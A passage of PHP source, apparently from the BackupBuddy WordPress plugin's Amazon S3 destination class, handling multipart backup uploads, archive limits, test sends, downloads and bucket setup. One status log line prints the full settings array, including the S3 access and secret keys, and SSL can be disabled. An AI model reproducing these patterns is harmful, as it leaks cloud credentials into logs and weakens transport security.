&$fileoptions_obj->options; $update_status = 'Sent part ' . $this_part_number . ' of ' . count( $settings['_multipart_counts'] ) . '.'; // Made it here so success sending part. Increment for next part to send. $settings['_multipart_partnumber']++; if ( !isset( $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ] ) ) { // No more parts exist for this file. Tell S3 the multipart upload is complete and move on. pb_backupbuddy::status( 'details', 'S3 getting parts with etags to notify S3 of completed multipart send.' ); $etag_parts = $s3->list_parts( $manage_data['bucket'], $settings['_multipart_remotefile'], $settings['_multipart_id'] ); pb_backupbuddy::status( 'details', 'S3 got parts list. Details: ' . print_r( $etag_parts, true ) ); pb_backupbuddy::status( 'details', 'Notifying S3 of multipart upload completion.' ); $response = $s3->complete_multipart_upload( $manage_data['bucket'], $settings['_multipart_remotefile'], $settings['_multipart_id'], $etag_parts ); if(!$response->isOK()) { $this_error = 'S3 unable to notify S3 of completion of all parts for multipart upload `' . $settings['_multipart_id'] . '`.'; global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { pb_backupbuddy::status( 'details', 'S3 notified S3 of multipart completion.' ); } pb_backupbuddy::status( 'details', 'S3 has no more parts left for this multipart upload. Clearing multipart instance variables.' ); $settings['_multipart_partnumber'] = 0; $settings['_multipart_id'] = ''; $settings['_multipart_file'] = ''; $settings['_multipart_remotefile'] = ''; // Multipart completed so safe to prevent housekeeping of incomplete multipart uploads. $settings['_multipart_transferspeeds'][] = $uploaded_speed; // Overall upload speed average. $uploaded_speed = array_sum( $settings['_multipart_transferspeeds'] ) / count( $settings['_multipart_counts'] ); pb_backupbuddy::status( 'details', 'Upload speed average of all chunks: `' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '`.' ); $settings['_multipart_counts'] = array(); // Update stats. $fileoptions['_multipart_status'] = $update_status; $fileoptions['finish_time'] = time(); $fileoptions['status'] = 'success'; if ( isset( $uploaded_speed ) ) { $fileoptions['write_speed'] = $uploaded_speed; } $fileoptions_obj->save(); unset( $fileoptions ); } // Schedule to continue if anything is left to upload for this multipart of any individual files. if ( ( $settings['_multipart_id'] != '' ) || ( count( $files ) > 0 ) ) { pb_backupbuddy::status( 'details', 'S3 multipart upload has more parts left. Scheduling next part send.' ); $cronTime = time(); $cronArgs = array( $settings, $files, $send_id, $delete_after ); $cronHashID = md5( $cronTime . serialize( $cronArgs ) ); $cronArgs[] = $cronHashID; $schedule_result = backupbuddy_core::schedule_single_event( $cronTime, pb_backupbuddy::cron_tag( 'destination_send' ), $cronArgs ); if ( true === $schedule_result ) { pb_backupbuddy::status( 'details', 'Next S3 chunk step cron event scheduled.' ); } else { pb_backupbuddy::status( 'error', 'Next S3 chunk step cron even FAILED to be scheduled.' ); } spawn_cron( time() + 150 ); // Adds > 60 seconds to get around once per minute cron running limit. update_option( '_transient_doing_cron', 0 ); // Prevent cron-blocking for next item. return array( $settings['_multipart_id'], 'Sent part ' . $this_part_number . ' of ' . count( $settings['_multipart_counts'] ) . ' parts.' ); } } // end if multipart continuation. require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); // Upload each file. foreach( $files as $file_id => $file ) { // Determine backup type directory (if zip). $backup_type_dir = ''; $backup_type = ''; if ( stristr( $file, '.zip' ) !== false ) { // If a zip try to determine backup type. pb_backupbuddy::status( 'details', 'S3: Zip file. Detecting backup type if possible.' ); $serial = backupbuddy_core::get_serial_from_file( $file ); // See if we can get backup type from fileoptions data. pb_backupbuddy::status( 'details', 'Fileoptions instance #9.' ); $backup_options = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/' . $serial . '.txt', $read_only = true, $ignore_lock = true ); if ( true !== ( $result = $backup_options->is_ok() ) ) { pb_backupbuddy::status( 'error', 'Unable to open fileoptions file `' . backupbuddy_core::getLogDirectory() . 'fileoptions/' . $serial . '.txt' . '`.' ); } else { if ( isset( $backup_options->options['integrity']['detected_type'] ) ) { pb_backupbuddy::status( 'details', 'S3: Detected backup type as `' . $backup_options->options['integrity']['detected_type'] . '` via integrity check data.' ); //$backup_type_dir = $backup_options->options['integrity']['detected_type'] . '/'; $backup_type = $backup_options->options['integrity']['detected_type']; } } // If still do not know backup type then attempt to deduce it from filename. if ( $backup_type == '' ) { if ( stristr( $file, '-db-' ) !== false ) { pb_backupbuddy::status( 'details', 'S3: Detected backup type as `db` via filename.' ); //$backup_type_dir = 'db/'; $backup_type = 'db'; } elseif ( stristr( $file, '-full-' ) !== false ) { pb_backupbuddy::status( 'details', 'S3: Detected backup type as `full` via filename.' ); //$backup_type_dir = 'full/'; $backup_type = 'full'; } else { pb_backupbuddy::status( 'details', 'S3: Could not detect backup type via integrity details nor filename.' ); } } } $credentials = pb_backupbuddy_destination_s3::get_credentials( $settings ); // Create S3 instance. pb_backupbuddy::status( 'details', 'Creating S3 instance.' ); $s3 = new AmazonS3( $credentials ); // the key, secret, token if ( $disable_ssl === true ) { @$s3->disable_ssl(true); } pb_backupbuddy::status( 'details', 'S3 instance created.' ); // Verify bucket exists; create if not. Also set region to the region bucket exists in. if ( false === self::_prepareBucketAndRegion( $s3, $settings ) ) { global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = 'Could not prepare bucket.'; return false; } // Handle chunking of file into a multipart upload (if applicable). $file_size = filesize( $file ); if ( ( $max_chunk_size >= self::MINIMUM_CHUNK_SIZE ) && ( ( $file_size / 1024 / 1024 ) > $max_chunk_size ) ) { // minimum chunk size is 5mb. Anything under 5mb we will not chunk. // About to chunk so cleanup any previous hanging multipart transfers. self::multipart_cleanup( $settings, $lessLogs = false ); pb_backupbuddy::status( 'details', 'S3 file size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' exceeds max chunk size of ' . $max_chunk_size . 'MB set in settings for sending file as multipart upload.' ); // Initiate multipart upload with S3. pb_backupbuddy::status( 'details', 'Initiating S3 multipart upload.' ); $response = $s3->initiate_multipart_upload( $settings['bucket'], $remote_path . $backup_type_dir . basename( $file ), array( 'encryption' => 'AES256', //'meta' => $meta_array, ) ); if(!$response->isOK()) { $this_error = 'S3 was unable to initiate multipart upload.'; global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { $upload_id = (string) $response->body->UploadId; pb_backupbuddy::status( 'details', 'S3 initiated multipart upload with ID `' . $upload_id . '`.' ); } // Get chunk parts for multipart transfer. pb_backupbuddy::status( 'details', 'S3 getting multipart counts.' ); $parts = $s3->get_multipart_counts( $file_size, $max_chunk_size * 1024 * 1024 ); // Size of chunks expected to be in bytes. $multipart_destination_settings = $settings; $multipart_destination_settings['_multipart_id'] = $upload_id; $multipart_destination_settings['_multipart_partnumber'] = 0; $multipart_destination_settings['_multipart_file'] = $file; $multipart_destination_settings['_multipart_remotefile'] = $remote_path . basename( $file ); $multipart_destination_settings['_multipart_counts'] = $parts; pb_backupbuddy::status( 'details', 'S3 multipart settings to pass:' . print_r( $multipart_destination_settings, true ) ); unset( $files[$file_id] ); // Remove this file from queue of files to send as it is now passed off to be handled in multipart upload. // Schedule to process the parts. pb_backupbuddy::status( 'details', 'S3 scheduling send of next part(s).' ); $cronTime = time(); $cronArgs = array( $multipart_destination_settings, $files, $send_id, $delete_after ); $cronHashID = md5( $cronTime . serialize( $cronArgs ) ); $cronArgs[] = $cronHashID; backupbuddy_core::schedule_single_event( $cronTime, pb_backupbuddy::cron_tag( 'destination_send' ), $cronArgs ); spawn_cron( time() + 150 ); // Adds > 60 seconds to get around once per minute cron running limit. update_option( '_transient_doing_cron', 0 ); // Prevent cron-blocking for next item. pb_backupbuddy::status( 'details', 'S3 scheduled send of next part(s). Done for this cycle.' ); return array( $upload_id, 'Starting send of ' . count( $multipart_destination_settings['_multipart_counts'] ) . ' parts.' ); } else { // did not meet chunking criteria. if ( $max_chunk_size != '0' ) { if ( ( $file_size / 1024 / 1024 ) > self::MINIMUM_CHUNK_SIZE ) { pb_backupbuddy::status( 'details', 'File size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' is less than the max chunk size of ' . $max_chunk_size . 'MB; not chunking into multipart upload.' ); } else { pb_backupbuddy::status( 'details', 'File size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' is less than the minimum allowed chunk size of ' . self::MINIMUM_CHUNK_SIZE . 'MB; not chunking into multipart upload.' ); } } else { pb_backupbuddy::status( 'details', 'Max chunk size set to zero so not chunking into multipart upload.' ); } } // SEND file. if ( 'standard' == $settings['storage'] ) { $storageVal = AmazonS3::STORAGE_STANDARD; } elseif( 'reduced' == $settings['storage'] ) { $storageVal = AmazonS3::STORAGE_REDUCED; } else { pb_backupbuddy::status( 'error', 'Error #854784: Unknown S3 storage type: `' . $settings['storage'] . '`.' ); } pb_backupbuddy::status( 'details', 'About to put (upload) object to S3: `' . $remote_path . $backup_type_dir . basename( $file ) . '`. Storage type: `' . $settings['storage'] . ' (' . $storageVal . ')`.' ); $response = $s3->create_object( $settings['bucket'], $remote_path . $backup_type_dir . basename( $file ), array( 'fileUpload' => $file, 'encryption' => 'AES256', 'storage' => $storageVal, //'meta' => $meta_array, ) ); unset( $storageVal ); // Validate response. On failure notify S3 API that things went wrong. if(!$response->isOK()) { // Send FAILED. $this_error = 'Failure uploading file to S3 storage. Failure details: `' .print_r( $response, true ) . '`'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { // Send SUCCESS. pb_backupbuddy::status( 'details', 'Success uploading file to S3 storage. Upload details: `' . print_r( $response, true ) . '`.' ); $uploaded_size = $response->header['_info']['size_upload']; $uploaded_speed = $response->header['_info']['speed_upload']; pb_backupbuddy::status( 'details', 'Uploaded size: ' . pb_backupbuddy::$format->file_size( $uploaded_size ) . ', Speed: ' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '/sec.' ); } unset( $files[$file_id] ); // Remove from list of files we have not sent yet. pb_backupbuddy::status( 'details', 'S3 success sending file `' . basename( $file ) . '`. File uploaded and reported to S3 as completed.' ); // Load destination fileoptions. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #8.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.84838. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = '#9034.84838'; return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = &$fileoptions_obj->options; // Save stats. if ( isset( $uploaded_speed ) ) { $fileoptions['write_speed'] = $uploaded_speed; $fileoptions_obj->save(); } unset( $fileoptions_obj ); } // end foreach. // BEGIN backup limits. if ( $limit > 0 ) { pb_backupbuddy::status( 'details', 'S3 archive limit enforcement to `' . $limit . '` archives beginning.' ); // S3 object for managing files. $s3_manage = new AmazonS3( $manage_data ); if ( $disable_ssl === true ) { @$s3_manage->disable_ssl(true); } if ( false === self::_prepareBucketAndRegion( $s3_manage, $settings ) ) { global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = 'Could not prepare bucket.'; return false; } // Get file listing. $response_manage = $s3_manage->list_objects( $manage_data['bucket'], array('prefix'=> $remote_path . $backup_type_dir )); // list all the files in the subscriber account // Create array of backups and organize by date $prefix = backupbuddy_core::backup_prefix(); // List backups associated with this site by date. $backups = array(); foreach( $response_manage->body->Contents as $object ) { $file = str_replace( $remote_path . $backup_type_dir, '', $object->Key ); if ( FALSE !== stristr( $file, '/' ) ) { // CRITICAL CODE! Subdir found due to slash. Do NOT display any files within a deeper subdirectory. Without this files could be deleted not belonging to this destination! continue; } if ( ! preg_match( self::BACKUP_FILENAME_PATTERN, $file ) ) { // CRITICAL CODE! Safety against accidental deletion of non-BB files. Do NOT delete files that do not look like a BackupBuddy backup filename. continue; } if ( FALSE === ( strpos( $file, 'backup-' . $prefix . '-' ) ) ) { // Not a backup for THIS site. Skip interacting with for limits. continue; } // S3 stores files in a directory per site so no need to check prefix here! if ( false !== strpos( $file, 'backup-' . $prefix . '-' ) ) { // if backup has this site prefix... $backups[$file] = strtotime( $object->LastModified ); } arsort( $backups ); pb_backupbuddy::status( 'details', 'S3 found `' . count( $backups ) . '` backups when checking archive limits.' ); if ( ( count( $backups ) ) > $limit ) { pb_backupbuddy::status( 'details', 'More archives (' . count( $backups ) . ') than limit (' . $limit . ') allows. Trimming...' ); $i = 0; $delete_fail_count = 0; foreach( $backups as $buname => $butime ) { $i++; if ( $i > $limit ) { pb_backupbuddy::status ( 'details', 'Trimming excess file `' . $buname . '`...' ); $response = $s3_manage->delete_object( $manage_data['bucket'], $remote_path . $backup_type_dir . $buname ); if ( !$response->isOK() ) { pb_backupbuddy::status( 'details', 'Unable to delete excess S3 file `' . $buname . '`. Details: `' . print_r( $response, true ) . '`.' ); $delete_fail_count++; } } } pb_backupbuddy::status( 'details', 'Finished trimming excess backups.' ); if ( $delete_fail_count !== 0 ) { $error_message = 'S3 remote limit could not delete ' . $delete_fail_count . ' backups.'; pb_backupbuddy::status( 'error', $error_message ); backupbuddy_core::mail_error( $error_message ); } } pb_backupbuddy::status( 'details', 'S3 completed archive limiting.' ); } else { pb_backupbuddy::status( 'details', 'No S3 archive file limit to enforce.' ); } // End remote backup limit // END backup limits. if ( isset( $fileoptions_obj ) ) { unset( $fileoptions_obj ); } // Success if we made it this far. return true; } // End send(). /* test() * * Tests ability to write to this remote destination. * * @param array $settings Destination settings. * @return bool|string True on success, string error message on failure. */ public static function test( $settings ) { if ( class_exists( 'CFRuntime' ) ) { die( 'CFRuntime already defined. Another plugin may be incorrectly loading its copy of S3 libraries on BackupBuddy pages.' ); } require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); $remote_path = self::get_remote_path( $settings['directory'] ); // Has leading and trailng slashes. $settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase. // Try sending a file. $send_response = pb_backupbuddy_destinations::send( $settings, dirname( dirname( __FILE__ ) ) . '/remote-send-test.php', $send_id = 'TEST-' . pb_backupbuddy::random_string( 12 ) ); // 3rd param true forces clearing of any current uploads. if ( false === $send_response ) { $send_response = 'Error sending test file to S3.'; } else { $send_response = 'Success.'; } // S3 object for managing files. $credentials = pb_backupbuddy_destination_s3::get_credentials( $settings ); $s3_manage = new AmazonS3( $credentials ); if ( $settings['ssl'] == 0 ) { @$s3_manage->disable_ssl(true); } // Verify bucket exists; create if not. Also set region to the region bucket exists in. if ( false === self::_prepareBucketAndRegion( $s3_manage, $settings ) ) { return false; } // Delete sent file. $delete_response = 'Success.'; $delete_response = $s3_manage->delete_object( $credentials['bucket'], $remote_path . 'remote-send-test.php' ); if ( !$delete_response->isOK() ) { $delete_response = 'Unable to delete test S3 file `remote-send-test.php`.'; pb_backupbuddy::status( 'details', $delete_response . ' Details: `' . print_r( $delete_response, true ) . '`.' ); } else { $delete_response = 'Success.'; } // Load destination fileoptions. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #7.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.84838. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = &$fileoptions_obj->options; if ( ( 'Success.' != $send_response ) || ( 'Success.' != $delete_response ) ) { $fileoptions['status'] = 'failure'; $fileoptions_obj->save(); unset( $fileoptions_obj ); return 'Send details: `' . $send_response . '`. Delete details: `' . $delete_response . '`.'; } else { $fileoptions['status'] = 'success'; $fileoptions['finish_time'] = time(); } $fileoptions_obj->save(); unset( $fileoptions_obj ); return true; } // End test(). /* download_file() * * Download remote file to local system. * * @param array $settings Destination settings. * @param string $remoteFile Remote filename. * @param string $localDestinationFile Full path & filename of destination file. * */ public static function download_file( $settings, $remoteFile, $localDestinationFile ) { require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); pb_backupbuddy::status( 'details', 'Downloading remote file `' . $remoteFile . '` from S3 to local file `' . $localDestinationFile . '`.' ); $manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings ); // Connect to S3. $s3 = new AmazonS3( $manage_data ); // the key, secret, token if ( $settings['ssl'] == '0' ) { @$s3->disable_ssl(true); } // Verify bucket exists; create if not. Also set region to the region bucket exists in. if ( false === self::_prepareBucketAndRegion( $s3, $settings ) ) { return false; } $manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings ); $remotePath = self::get_remote_path( $settings['directory'] ); // includes trailing slash. $get_response = $s3->get_object( $manage_data['bucket'], $remotePath . $remoteFile, array( 'fileDownload' => $localDestinationFile ) ); if ( ! $get_response->isOK() ) { pb_backupbuddy::status( 'error', 'Error #958483. Unable to retrieve S3 object `' . $remoteFile . '`.' ); return false; } else { pb_backupbuddy::status( 'details', 'Success copying remote S3 object `' . $remoteFile . '` to local.' ); return true; } } // end download_file(). /* get_credentials() * * Get the required credentials and management data for managing user files. * * @return false|array Boolean false on failure. Array of data on success. */ public static function get_credentials( $settings ) { $settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase. $credentials = array( 'bucket' => $settings['bucket'], 'key' => $settings['accesskey'], 'secret' => $settings['secretkey'], ); if ( '1' == $settings['use_packaged_cert'] ) { pb_backupbuddy::status( 'details', 'Using packaged cacert.pem file based on destination settings.' ); $credentials['ssl.certificate_authority'] = pb_backupbuddy::plugin_path() . '/destinations/_s3lib/aws-sdk/lib/requestcore/cacert.pem'; } return $credentials; } // End get_manage_data(). /* get_remote_path() * * Returns the site-specific remote path to store into. * Slashes (caused by subdirectories in url) are replaced with underscores. * Always has a leading and trailing slash. * * @return string Ex: /dustinbolton.com_blog/ */ public static function get_remote_path( $directory = '' ) { $directory = trim( $directory, '/\\' ); if ( $directory != '' ) { $directory .= '/'; } return $directory; } // End get_remote_path(). /* get_bucket_region() * * Gets the region in which the specified Amazon S3 bucket is located. * This is a fixed up version of the Amazon SDK 1.6.2 method in s3.class.php * which is broken under PHP 5.4 because of a broken to_string() function * that returns a null value. This replacement avoids a direct string cast of the * response body and does an array cast instead and that gives us the correct * string value to put back into the response body. * * The AmazonS3 object passed in must have already had credentials supplied * * @param object $s3 (Required) The instantiated AmazonS3 object to use * @param string $bucket (Required) The name of the bucket to use. * @param array $opt (Optional) An associative array of parameters * * @return CFResponse A <CFResponse> object containing a parsed HTTP response. */ public static function get_bucket_region($s3, $bucket, $opt = null) { // Add this to our request if (!$opt) $opt = array(); $opt['verb'] = 'GET'; $opt['sub_resource'] = 'location'; // Authenticate to S3 $response = $s3->authenticate($bucket, $opt); if ($response->isOK()) { // Handle body - this _should_ create an array with elements [@attributes] which is iself // an array of attributes and [0] which should in this case be the "value" of the element or // may not be present if the element is empty (has no value) $response_body = (array) $response->body; // For US Standard region body would have empty value so no element [0] - but [@attributes] // element always present so array is not empty so that is not a valid test for no value ( isset( $response_body[ 0 ] ) ) ? $response->body = $response_body[ 0 ] : $response->body = '' ; // Need to translate a returned region of EU into eu-west-1 because EU is not a region but // a location constraint but it seems that in some cases this is returned as a region value. ( 'EU' === $response->body )? $response->body = 'eu-west-1' : false ; } return $response; } /* multipart_cleanup() * * S3 does NOT automatically clean up failred or expired multipart chunk files so clean up for them. * */ public static function multipart_cleanup( $settings, $lessLogs = true ) { $settings['bucket'] = strtolower( $settings['bucket'] ); // Buckets must be lowercase. $max_age = 60*60*72; // Seconds of max age to allow a stalled multipart upload. require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); pb_backupbuddy::status( 'details', 'Amazon S3 Multipart Remote Housekeeping Starting ...' ); $manage_data = pb_backupbuddy_destination_s3::get_credentials( $settings ); // Create S3 instance. pb_backupbuddy::status( 'details', 'Creating S3 instance.' ); $s3 = new AmazonS3( $manage_data ); // the key, secret, token if ( $settings['ssl'] == 0 ) { @$s3->disable_ssl(true); } pb_backupbuddy::status( 'details', 'S3 instance created. Listing in progress multipart uploads ...' ); // Verify bucket exists; create if not. Also set region to the region bucket exists in. if ( false === self::_prepareBucketAndRegion( $s3, $settings, $createBucket = false ) ) { return false; } // Get the in progress multipart uploads $response = $s3->list_multipart_uploads( $settings['bucket'], array( //'prefix' => $settings['_multipart_remotefile'], 'prefix' => 'backup', ) ); if(!$response->isOK()) { pb_backupbuddy::status( 'error', 'Error listing multipart uploads. Details: `' . print_r( $response, true ) . '`' ); return; } else { if ( true !== $lessLogs ) { pb_backupbuddy::status( 'details', 'Multipart upload check retrieved. Found `' . count( $response->body->Upload ) . '` multipart uploads in progress / stalled. Details: `' . print_r( $response, true ) . '`' ); } else { pb_backupbuddy::status( 'details', 'Multipart upload check retrieved. Found `' . count( $response->body->Upload ) . '` multipart uploads in progress / stalled. Old BackupBuddy parts will be cleaned up (if any found) ...' ); } foreach( $response->body->Upload as $upload ) { if ( true !== $lessLogs ) { pb_backupbuddy::status( 'details', 'Checking upload: ' . print_r( $upload, true ) ); } if ( FALSE !== stristr( $upload->Key, 'backup-' ) ) { // BackupBuddy backup file. $initiated = strtotime( $upload->Initiated ); if ( true !== $lessLogs ) { pb_backupbuddy::status( 'details', 'BackupBuddy Multipart Chunked Upload(s) detected in progress. Age: `' . pb_backupbuddy::$format->time_ago( $initiated ) . '`.' ); } if ( ( $initiated + $max_age ) < time() ) { $abort_response = $s3->abort_multipart_upload( $settings['bucket'], $upload->Key, $upload->UploadId ); if(!$abort_response->isOK()) { // abort fail. pb_backupbuddy::status( 'error', 'Stalled Amazon S3 Multipart Chunked abort of file `' . $upload->Key . '` with ID `' . $upload->UploadId . '` FAILED. Manually abort it.' ); } else { // aborted. pb_backupbuddy::status( 'details', 'Stalled Amazon S3 Multipart Chunked Uploads ABORTED ID `' . $upload->UploadId . '` of age `' . pb_backupbuddy::$format->time_ago( $initiated ) . '`.' ); } } else { if ( true !== $lessLogs ) { pb_backupbuddy::status( 'details', 'Amazon S3 Multipart Chunked Uploads not aborted as not too old.' ); } } } } // end foreach uploads. } pb_backupbuddy::status( 'details', 'Amazon S3 Multipart Remote Housekeeping Finished.' ); return true; } // end multipart_cleanup(). /* _prepareBucketAndRegion() * * Validates bucket existance, creating if needed. Sets region for non-US usage. * * @param object &$s3 S3 object currently in use. Pased by reference so region can be set. * @param array $settings Destination settings array. * @param bool $createBucket Whether or not to create bucket if it does not currently exist. * @return bool true on all okay, false otherwise. * */ private static function _prepareBucketAndRegion( &$s3, $settings, $createBucket = true ) { // Get bucket region to determine if a bucket already exists. // Assume we will not have to try and create a bucket $maybe_create_bucket = false; pb_backupbuddy::status( 'details', 'Getting region for bucket: `' . $settings['bucket'] . "`." ); $response = self::get_bucket_region( $s3, $settings['bucket'] ); if( !$response->isOK() ) { $this_error = 'Bucket region could not be determined; bucket may not exist yet. Message details: `' . (string)$response->body->Message . '`.'; pb_backupbuddy::status( 'details' , $this_error ); // Assume we have to create the bucket $region = ''; $maybe_create_bucket = true; } else { pb_backupbuddy::status( 'details', 'Bucket exists in region: ' . (($response->body ==="") ? 'us-east-1' : $response->body ) ); $region = $response->body; // Must leave as is for actual operational usage } // Set region context for later operations - note that if we are going to try and create // a bucket the region will have been set to empty so we'll get the bucket created in the // user-specified region. if ( '' == $region ) { // Bucket has no current region (ie it does not exist). Set user-specified region for new buckets. $s3->set_region( $settings['region'] ); } else { $s3->set_region( 's3-' . $region . '.amazonaws.com' ); } // Create bucket if it does not exist AND parameter pased to this function to create the bucket set to true. // Region/endpoint used based on user-defined setting. if ( ( true === $maybe_create_bucket ) && ( true === $createBucket ) ) { pb_backupbuddy::status( 'details', 'Attempting to create bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '` (detected region: `' . $region . '`).' ); try { $response = $s3->create_bucket( $settings['bucket'], $settings['region'], AmazonS3::ACL_PRIVATE ); } catch( Exception $e ) { $message = 'Exception while trying to create bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '` (detected region: `' . $region . '`). Details: `' . $e->getMessage() . '`.'; pb_backupbuddy::status( 'error', $message ); echo $message; return false; } if ( ! $response->isOK() ) { // Bucket creation FAILED. $message = 'Failure creating bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '` (detected region: `' . $region . '`). Message details: `' . (string)$response->body->Message . '`. '; if ( '' == $region ) { $message .= ' Note: Since the region could not be detected, if you are using IAM security, verify this resource ALLOWs the action "s3:GetBucketLocation". '; } pb_backupbuddy::status( 'error', $message ); echo $message; return false; } else { // Send SUCCESS. if ( is_object( $response->body ) ) { $messageDetails = (string)$response->body->Message; } else { $messageDetails = ''; } pb_backupbuddy::status( 'details', 'Success creating bucket `' . $settings['bucket'] . '` at region endpoint `' . $settings['region'] . '`. Message details: `' . $messageDetails . '`.' ); unset( $messageDetails ); } } // end if create bucket. return true; } // end _prepareBucketAndRegion(). } // End class.